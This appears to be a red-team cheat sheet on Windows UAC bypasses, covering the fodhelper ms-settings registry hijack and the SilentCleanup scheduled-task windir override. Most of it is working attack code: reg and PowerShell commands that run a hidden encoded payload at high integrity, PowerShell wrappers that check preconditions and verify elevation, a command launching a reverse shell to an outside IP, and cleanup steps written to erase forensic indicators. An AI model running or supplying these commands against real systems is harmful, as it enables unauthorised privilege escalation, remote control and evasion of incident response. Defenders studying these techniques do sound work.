UAC Bypasses

FODhelper

fodhelper.exe (C:\Windows\System32) carries an autoElevate manifest and opens the ms-settings: protocol handler. HKCU\Software\Classes is merged ahead of HKLM in HKCR, so a per-user handler with an empty DelegateExecute value makes the already-elevated fodhelper.exe run our command at high integrity without a prompt. Needs a member of Administrators running at medium integrity and UAC below "Always notify"; delete HKCU\Software\Classes\ms-settings afterwards, the key is a well-known IOC.

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell.exe -nop -w hidden -e <ENCODED COMMAND>"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
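PowerShell version of the same bypass, added here as an example and not taken from the original page: it checks the preconditions first (UAC policy, Administrators membership, medium integrity), proves the elevation with a marker file, and removes the hijacked ProgID in a finally block. Function names and the marker path are my own choices.

```powershell
# Added example, not from the original page: fodhelper bypass with a precondition
# check, a success check and guaranteed cleanup of the hijacked ms-settings key.
# Assumed: Windows 10/11, current user in Administrators but at medium integrity,
# UAC below "Always notify". Function names and the marker file are hypothetical.

function Test-UacAutoElevatePreconditions {
    # Auto-elevation needs (1) UAC enabled, (2) a policy other than "Always notify"
    # (ConsentPromptBehaviorAdmin = 2) and (3) a token carrying the Administrators SID.
    # The filtered medium-integrity token lists S-1-5-32-544 as "deny only", so .NET
    # IsInRole() says false; whoami still prints it, hence the raw output is parsed.
    $pol    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $groups = whoami /groups
    $inAdmins = [bool]($groups -match 'S-1-5-32-544')
    $medium   = [bool]($groups -match 'S-1-16-8192')   # already high -> nothing to bypass
    return ($pol.EnableLUA -eq 1) -and ($pol.ConsentPromptBehaviorAdmin -ne 2) -and $inAdmins -and $medium
}

function Invoke-FodhelperBypass {
    param(
        [Parameter(Mandatory)][string]$Command,  # command line the elevated shell verb runs
        [int]$WaitSeconds = 5                     # let fodhelper read the handler before cleanup
    )
    $key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    if (-not (Test-UacAutoElevatePreconditions)) {
        throw 'Need an Administrators member at medium integrity with UAC not at "Always notify"'
    }
    try {
        New-Item -Path $key -Force | Out-Null
        # An empty DelegateExecute makes the shell fall back to (Default) instead of a COM handler
        New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
        Set-ItemProperty -Path $key -Name '(Default)' -Value $Command
        # fodhelper.exe is autoElevate-manifested and opens ms-settings:; HKCU\Software\Classes
        # is merged ahead of HKLM in HKCR, so the per-user handler above is the one that runs
        Start-Process -FilePath "$env:windir\System32\fodhelper.exe"
        Start-Sleep -Seconds $WaitSeconds
    }
    finally {
        # Remove the whole hijacked ProgID so nothing is left behind for DFIR
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    }
}

function Test-BypassSucceeded {
    # Reads the marker written by the usage payload below; the child of fodhelper
    # should report High Mandatory Level (S-1-16-12288)
    param([string]$MarkerPath = "$env:TEMP\uac_check.txt")
    return (Test-Path $MarkerPath) -and [bool]((Get-Content $MarkerPath) -match 'S-1-16-12288')
}

# Usage: prove elevation with a harmless payload first, then swap in the real one
Invoke-FodhelperBypass -Command "cmd.exe /c whoami /groups > `"$env:TEMP\uac_check.txt`""
Test-BypassSucceeded
```

The sleep before cleanup matters: deleting the key immediately after Start-Process can race fodhelper.exe and the handler is gone before it is read.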

Standard Scheduled Task

The SilentCleanup task (\Microsoft\Windows\DiskCleanup) runs %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive% with highest privileges and can be started on demand by standard users. Per-user values in HKCU\Environment override the machine-wide windir when the scheduler builds the environment block for the new process, so %windir% expands to our command line with no logoff needed; the trailing "& REM " comments out the rest of the original action. Same preconditions as fodhelper. Remove the windir value afterwards, otherwise every later process of this user breaks and the override is an obvious IOC.

Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd.exe /K C:\Windows\Tasks\RShell.exe <IP> 8080 & REM " -Force
Start-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup\" -TaskName "SilentCleanup"
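Wrapped version of the two commands above, added here as an example and not from the original page: it first verifies that SilentCleanup still exists, still runs at RunLevel Highest and still references %windir% (hardened builds may change any of these), then sets the override, fires the task and removes the value again. Function names and the RShell.exe path are placeholders.

```powershell
# Added example, not from the original page: SilentCleanup bypass with a check that
# the task is actually usable on this host plus cleanup of the per-user windir
# override. Assumed: Administrators member at medium integrity, UAC below "Always
# notify". Function names and the payload path are hypothetical.

function Test-SilentCleanupUsable {
    # The task is a bypass primitive only if it exists, runs with highest privileges
    # and its action starts with %windir%, so the per-user override gets expanded
    $task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' -TaskName 'SilentCleanup' -ErrorAction SilentlyContinue
    if (-not $task) { return $false }
    $usesWindir = $task.Actions | Where-Object { $_.Execute -like '%windir%*' }
    return ($task.Principal.RunLevel -eq 'Highest') -and [bool]$usesWindir
}

function Invoke-SilentCleanupBypass {
    param(
        [Parameter(Mandatory)][string]$Command,  # e.g. 'C:\Windows\Tasks\RShell.exe 10.10.10.10 8080'
        [int]$WaitSeconds = 5
    )
    if (-not (Test-SilentCleanupUsable)) {
        throw 'SilentCleanup is missing, not RunLevel Highest, or no longer uses %windir%'
    }
    # "%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%" now expands to
    # "cmd.exe /K <Command> & REM \system32\cleanmgr.exe /autoclean /d C:", so the
    # trailing "& REM " swallows the original path and arguments; /K keeps cmd alive
    $override = "cmd.exe /K $Command & REM "
    try {
        # HKCU\Environment wins over the machine-wide windir when the scheduler builds
        # the new process's environment block; no broadcast or logoff required
        Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value $override -Force
        Start-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' -TaskName 'SilentCleanup'
        Start-Sleep -Seconds $WaitSeconds
    }
    finally {
        # A fake windir breaks every later process of this user and is a loud IOC
        Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force -ErrorAction SilentlyContinue
    }
}

# Usage: prove elevation with a harmless command first, then the real payload
Invoke-SilentCleanupBypass -Command "whoami /groups > `"$env:TEMP\uac_check.txt`""
Select-String -Path "$env:TEMP\uac_check.txt" -Pattern 'S-1-16-12288'
```

Do not Stop-ScheduledTask afterwards if the payload is a reverse shell: the elevated cmd /K is the task's process, and stopping the task kills it.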
